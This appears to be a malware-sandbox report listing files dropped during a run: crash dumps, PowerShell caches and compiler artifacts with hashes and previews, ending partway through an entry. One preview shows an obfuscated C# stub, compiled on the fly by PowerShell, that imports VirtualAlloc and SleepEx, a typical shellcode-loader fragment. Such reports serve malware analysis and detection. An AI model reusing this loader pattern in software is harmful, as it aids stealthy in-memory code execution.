                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.3.6.0.5.9.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.6.7.9.3.5.3.0.9.0.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.6.8.f.e.a.e.-.1.3.e.b.-.4.b.8.7.-.a.8.a.d.-.3.5.e.c.1.a.c.8.a.3.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.4.9.d.4.4.c.-.a.8.3.4.-.4.9.8.a.-.b.a.8.2.-.c.3.d.a.4.5.4.7.f.4.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.4.-.0.0.0.1.-.0.0.1.c.-.6.f.9.9.-.5.e.0.5.d.9.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:08 2022, 0x1205a4 type
                      Category:dropped
                      Size (bytes):39506
                      Entropy (8bit):2.072438553320638
                      Encrypted:false
                      SSDEEP:192:J54NgWJJkH67dJ+OIKcUcXyK7UbBDaNCQSxtledkyhmWlzwkEFsdw:3LWT7j5IjU4yK7UbBDaMQ6tledkytK
                      MD5:C917F1742DC83F5A043197F2F54A0C4E
                      SHA1:AACA0FC29708705FDBB4F63CC4E9962D0EC5E3EF
                      SHA-256:142F090B56F1D4E7F37963F99E41AAD407C6F3C1F845BC0915A7EFF81C662889
                      SHA-512:61CE862EBD1E02188B5920FA6A57B7269CC4B69FE874AF24C8EB589484EC9B08B540D6E4550CA540686700FAB1A8BC6065D34B9DD7F7DDFF68E5E1E6D68004A6
                      Malicious:false
                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T...............j............................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8340
                      Entropy (8bit):3.69846117157985
                      Encrypted:false
                      SSDEEP:192:Rrl7r3GLNiN/6idq06Y43SUHqgmfJSP+prQ89bgW2TsfkAm:RrlsNiF6W6YoSUKgmfJS2gW24fy
                      MD5:03FE517493CDA2DA9A9CB5CF3B51E3C8
                      SHA1:6DAA111381E6A2BA15D14F385ECD9EE1E680EE70
                      SHA-256:088A2319CDDC0633C74897267FED482A3F4602182B6757D5E276C4283FAA5988
                      SHA-512:2097EA78A64D0674A3B8CA2D51A0229B07993A46B876B48F168F926A802EDD16BE710F9EFEB5CA1B5468D0F5E26299ED049E44074A9923C903CAD0A66D567DBC
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4598
                      Entropy (8bit):4.468439994201981
                      Encrypted:false
                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhP8fm8M4J2+EZFI+q849hGpKcQIcQw0kd:uITfIoWgrsqY1UJKErGpKkw0kd
                      MD5:1F581D2D671323001820EEC345955E8D
                      SHA1:84D57DE07A1A92920A775FD9A2EF441FD6D55EDC
                      SHA-256:F3C1719825384E2811940641C8F25B5C7C9A8CF7FDFF96C79BD1B7094C66BDC1
                      SHA-512:E435C1E51CFA9E549F043F8BE4DA0878D52CAA517CC84E732A0800404F08FCC0EE1566E386E3B198C6E254997C8707CD2ED5AF4131285373A55FCFE4191FBF2C
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 06:12:14 2022, 0x1205a4 type
                      Category:dropped
                      Size (bytes):36062
                      Entropy (8bit):1.9519178024623962
                      Encrypted:false
                      SSDEEP:192:b5fZJJkHYyfKOIKcmk2QSxksjVaYHbiJjmJmRsK:9h4VIjmk2Q6ksjYUmX
                      MD5:B26D761700EC27A85A7E8306F7D9C1CD
                      SHA1:26BA946FC504E3B720545A54C6166E6A2841B1FC
                      SHA-256:A4A981D31AF326622D356EB84A53F327157F52F7EFB02CADB292060F7810FE72
                      SHA-512:3205B01478F80D692A1735122340421C8868EF2150ACB96AFFB58777B301034BF223260BF04B93CCDA2F160E29DA10286CD50E4077D174CBEDA5750449E600C3
                      Malicious:false
                      Preview:MDMP....... .........cb........................4...........$................)..........`.......8...........T................t...........................................................................................U...........B..............GenuineIntelW...........T.............cb.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8300
                      Entropy (8bit):3.69036741286865
                      Encrypted:false
                      SSDEEP:192:Rrl7r3GLNiNx6ihq06Y4YSUfPgmfRSO+pDn89b3dW2Tsf3lFm:RrlsNiL6q6Y3SU3gmfRSitW24fe
                      MD5:C80DFEB2FD09E96D80A105BF1416186F
                      SHA1:C2E029A858E8ED96BB46CEB163704C526428BB15
                      SHA-256:B3CE25563BAB4D09351E626D47559203FC2F9E73F43D27AD95C8222BBF41688F
                      SHA-512:785520C461DF2D2ABFFD907C65A3656B50232434394EA4CE68D02BBC5569D2D3EB307DA67ADCD9C9CE8FD99F9FC0AA888E4456CF642EA1AC3E72D14B7C470FD5
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.2.8.<./.P.i.d.>.......
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4564
                      Entropy (8bit):4.439548228059502
                      Encrypted:false
                      SSDEEP:48:cvIwSD8zs6JgtWI9PnWgc8sqYjhx8fm8M4J2+voFI+q84acupKcQIcQw0kd:uITfIoWgrsqY1WJVBO/pKkw0kd
                      MD5:DF03F167543BFE5B6CDEF17CD6CDB700
                      SHA1:6BBC61B7DBF6EB32A530D87A971944CDD312120D
                      SHA-256:84B755FD6CFD16130CE8987B8BBE160B50DAB6E97F05AB376C74909198264B80
                      SHA-512:504C3F517AFEBFE84B4641320FCCB9107C42081F8A6A8672E073F46341DF6CF43569F29E69B8623EC2F86F32A92262FD58EB57FBA10F4F81EACBD4AD6E3E719E
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1484122" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):11606
                      Entropy (8bit):4.8910535897909355
                      Encrypted:false
                      SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                      MD5:F84F6C99316F038F964F3A6DB900038F
                      SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                      SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                      SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                      Malicious:false
                      Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.985489714311352
                      Encrypted:false
                      SSDEEP:24:Hre9ERhfpaDfHVhKdNWI+ycuZhNPHqakSGHbPNnq9qd:LSjKd41ulPqa30Rq9K
                      MD5:67C978F8F6E761129B658BABBAC2C0E3
                      SHA1:02E6453D6EA95F5A0EBB0631D927EE771F4B7B0A
                      SHA-256:9BB6FB8D9FDC155D50F117D1CE410A264593B74F41FEA700ED29099228FA1C4A
                      SHA-512:78B24238F9F3B4FCF3507F65C29D5F7BA58EBD9866A22239C476D50CDF207B93030B71584F41784CBB2DECB40C888689A5C7BD9953555770ACCCA9954B5A23BD
                      Malicious:false
                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP.................a.....-...`.~............4.......C:\Users\user\AppData\Local\Temp\RES2392.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.965326095070505
                      Encrypted:false
                      SSDEEP:24:HJe9EuZfTDQDfHLWhKdNWI+ycuZhNsrakSPEPNnq9qd:ABTqrMKd41ulsra3PEq9K
                      MD5:E34239A621ECB61A5F50016AE522485A
                      SHA1:EDD24063A2BC018FA0F98951A747630C5925D5FE
                      SHA-256:E0F555AAE679A2E77185A2DAD637DAD6F1477AEA45415837C204061570AC891E
                      SHA-512:5DBA844206EEA3E6E4EC60343E5AA08271F863EC568A169E9EB0904C0D4979CDC5435999ABA05E08CF6AD6DC29078C89CF6C0AC8509D7C3CB4DBEB7D60DECED1
                      Malicious:false
                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP.................sf.]..E`W`..<............4.......C:\Users\user\AppData\Local\Temp\RES3B60.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0806512987018424
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKrak7YnqqPEPN5Dlq5J:+RI+ycuZhNsrakSPEPNnqX
                      MD5:8C7366A75D058E4560576098B53C2E89
                      SHA1:5474E9C863C4BB1B86DA13FEB1DCBAC13BEA6A83
                      SHA-256:045887EA02E67AD0120E0D470B59C58099BFDBA859F1F3E31989AE8800BC7765
                      SHA-512:CDA6B16F3E42B84FB648CD74482E2B7C4B9E2EB463F8D24A96E3893AD7667D9CBC094AE597AF695AD032ADA6CADE89F3E891EC2F6896966882516BBE7DBC3BF1
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):417
                      Entropy (8bit):5.038440975503667
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                      MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                      SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                      SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                      SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.246210484932597
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbNOzxs7+AEszIwkn23fbNYA:p37Lvkmb6KRfT4WZEifT1
                      MD5:1DFF526FD701241566C75FC5465D31AF
                      SHA1:5D91CBBE8D1F790F3A38CE35DAB4F705A0BEEF6E
                      SHA-256:ED2CAE80D53441FB70A3307AEB276D80C5D4176F9A9D336B5C87305DC0064ACF
                      SHA-512:E38E5E1D62A47ACAE2F46256453F82352BD5A6AF881D21EB8EC317AB60B4AE452E95E018271A9DD44FA9176799BFE8FB05E5359AF14399820DF6EDAECE85B2D5
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6501357671778076
                      Encrypted:false
                      SSDEEP:24:etGSzMWWOJy853Ek0s2E7OgDdWQzbtkZfkd2OWI+ycuZhNsrakSPEPNnq:6pvz5UkGE7vxWQzqJkd211ulsra3PEq
                      MD5:0DB7703243576F0A4B5D43BDB20FD12B
                      SHA1:67974086EB1D388F41FA3D91AB2BE5C6EE06D2CF
                      SHA-256:6B514B672F123A4399CAE02C921B046A1FC00D0A01C34B758A7D14F92E1C8BE1
                      SHA-512:0962E8886173F666E25787071C9794A4A158FAC0226AE3B19E9E954EC2088268172F1F4AE23671A74BF47E715048082E3E7904B32C5EAF74B0EBBE30A6117A2F
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....*BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d.......*.....3.D.....=.......O.......W...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.325866700512367
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRfTJEifTQKaM5DqBVKVrdFAMBJTH:Akka6CTJEuTQKxDcVKdBJj
                      MD5:EE4CA1452DEB397DB57596D3E6012A15
                      SHA1:E8C4E64E4E2C6AE91EB3B78C460A8D65FB9377EA
                      SHA-256:102035269C1F6AC6AECEC5D33A268EDB5A33E3BBA56F775441E271EF9C71A7CC
                      SHA-512:EBEB340BC62C181C89B1694C8DBB2D55326A7F19D987686A5A0F7E1B0A59A2824E488CFDD710F2FFABD8683F8038E0FA5163929004F631216B1EA355FD11BE35
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.089404989746942
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Hqak7YnqqGHbPN5Dlq5J:+RI+ycuZhNPHqakSGHbPNnqX
                      MD5:611F888895B72D1096C460FF7EA5E4B7
                      SHA1:67CCD8B6129567C2A7CF8B601FD2709FA13D13D0
                      SHA-256:FFF630440C6AC27F1A70771D2279FE270829A76357941949BA22EB16BD260D6F
                      SHA-512:0FB11E6584AA80780E1C263285F568A6C77773F35D7A3724692C2B8DD0A0E52D3A8CAA2D4F434F69109650B9243DC474C8EA2BD5C157C8734C297E5584912CA6
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):411
                      Entropy (8bit):5.082169696837192
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                      MD5:248E15CD19191D4333303E0E1F8E9A70
                      SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
